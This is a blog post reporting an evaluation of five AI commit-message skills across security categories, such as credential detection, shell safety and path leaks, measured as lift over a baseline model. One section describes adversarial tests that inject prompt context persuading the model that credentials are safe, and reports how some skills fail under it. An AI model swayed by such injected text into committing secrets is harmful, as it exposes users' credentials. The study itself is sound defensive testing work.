We tested 5 AI commit-message skills on security. 3 made things worse.

Published: (January 31, 2026 at 05:22 PM EST)
4 min read
Source: Dev.to

Source: Dev.to

Overview

Reusable AI components are exploding — skills, MCP servers, templates, sub‑agents.
But there’s no shared way to answer the question: “Will this actually help?”

We ran a behavioral evaluation study to find out. The results were surprising.

  • Of the 5 commit‑message skills we tested from GitHub for security, only 2 showed a positive lift over baseline.
  • The other 3 produced negative lift — worse outcomes than using no skill at all.
  • The top performer? A skill with zero security rules.

Even more striking: in our small sample, static analysis was an unreliable predictor of overall security performance. The skill that looked least secure (scoring 42/100 on a prompt‑only review) achieved the highest lift.

Static analysis did predict credential detection well — but failed across other categories. With only 5 skills this is a preliminary signal, not a definitive finding — but it suggests you need to measure what a skill does, not just read what it says.

Measuring “Lift”

To measure whether a skill actually helps, we need a baseline‑relative metric called lift:

[ \textbf{Lift} = \text{Skill Pass Rate} - \text{Baseline Pass Rate} ]

  • Positive lift → the skill adds value.
  • Negative lift → you’re better off without it.

In our tests, the baseline (Claude with no skill) achieved a 50 % overall pass rate across security categories, but this varies dramatically by category.

CategoryBaseline Pass RateInterpretation
S1: Credential Detection81.7 %Model already good at obvious credentials
S2: Credential Files85.0 %Model already good at .env detection
S3: Git‑Crypt Awareness15.0 %Model over‑refuses encrypted files
S4: Shell Safety53.3 %Model sometimes includes unsafe syntax
S5: Path Sanitization16.7 %Model often leaks sensitive paths

Baseline performance ranges from 15 % to 85 %. Skills add the most value where the baseline is weak (S3, S4, S5).

Test Setup

  • 5 commit‑message skills were selected from public GitHub repositories.
  • Each skill was evaluated on 100 security scenarios (5 categories × 2 difficulty levels × 10 tests).
  • Each test was run 3 times to reduce noise → ≈1,500 total executions.
  • Generation used Claude Haiku; results may differ with larger models.

Skills Tested

SkillLength (chars)ApproachLift
epicenter8,586Strict conventional commits with 50‑char limit+6.0 %
ilude8,389Comprehensive git workflow with security scanning+1.7 %
toolhive431Minimal best practices‑1.0 %
kanopi4,610Balanced commit conventions with security warnings‑4.0 %
claude‑code‑helper4,376General‑purpose assistant with commit capabilities‑4.3 %

The top performer, epicenter, contains zero security instructions (no credential detection, no secret scanning, no warnings about sensitive files).

Why a Format‑Focused Skill Beat Security‑Focused Ones

Constraint‑based safety:

  • epicenter’s strict 50‑character limit dramatically reduces the likelihood of shell metacharacters appearing in output.
  • Its abstract scope requirements discourage exposing sensitive path details.

Thus, format constraints provide implicit security without explicit rules.

Important caveat: epicenter’s overall lift hides category‑specific weaknesses.

  • S1 (credential detection): ‑10 %
  • S2 (credential files): ‑27 %
  • Its +6 % overall lift comes entirely from dominating S3, S4, and S5.
    If catching API keys is your priority, epicenter is the wrong choice.

Static Analysis vs. Real‑World Performance

We asked Claude to rate each skill (0‑100) on security awareness based solely on the prompt text.

SkillSecurity MentionsStatic ScoreActual Lift
epicenterNone — pure format guidance42/100+6.0 %
iludeExplicit scanning rules, git‑crypt exceptions78/100+1.7 %
kanopiAPI keys, secrets, credentials, .env files52/100‑4.0 %

Static analysis scores showed a weak correlation with actual lift (r = 0.32).

Category‑Level Correlations

CategoryCorrelation (r)Meaning
S1: Credential Detection+0.87Explicit rules help
S4: Shell Safety‑0.68More rules = worse performance
S3: Git‑Crypt‑0.50More rules = worse performance

With n = 5, these correlations are noisy and not statistically significant, but the pattern is notable: for some categories, detailed instructions actively backfire.

Adversarial vs. Base Tests

Our suite includes base (straightforward) and adversarial variants. Adversarial tests add prompt‑injection context designed to trick the model into ignoring security constraints.

Dramatic Failure: toolhive

SkillS1 BaseS1 AdversarialΔ (percentage points)
toolhive+16.7 %‑23.3 %‑40 pp
ilude+33.3 %+3.3 %‑30 pp

toolhive goes from +16.7 % to ‑23.3 % — a 40‑point collapse. It handles straightforward cases well but fails when prompt injection tries to convince the model the credentials are safe.

Why doesn’t epicenter collapse?
Because it doesn’t rely on pattern‑matching. Its format constraints (e.g., the 50‑character limit) bound the output space, making social engineering ineffective: a 50‑character commit message simply can’t contain a full API key.

The Core Principle: Structural Constraints Over Explicit Rules

Format ConstraintSecurity EffectLift Contribution
50‑char limitLess room for shell commands like $(cmd)+20 % (S4)
Abstract scopesDiscourages client names or file paths+27 % (S5)
No security rulesNo over‑refusal of encrypted files+30 % (S3)

Takeaway: Instead of listing what to avoid, set structural limits that reduce the likelihood of violations. A 50‑character limit doesn’t mention shell injection, yet it significantly constrains the output space available for an attacker.

Scope

  • 5 skills
  • 1 domain – security‑focused tests

Models

  • Results generated with Claude Haiku.
  • Larger models may handle verbose instructions differently.

Rigor

  • Results have been human‑audited.
  • We are publishing:
    • Judge prompts
    • Agreement rates
    • Confidence intervals

Publication Note

We are releasing this early because limited data is better than no data. We’d rather be challenged on real numbers than be trusted on intuition.

Resources

  • Full methodology and judge rubrics:
  • Part 2 of this series (ablation testing – isolating exactly which constraints matter):
Back to Blog

Related posts

Read more »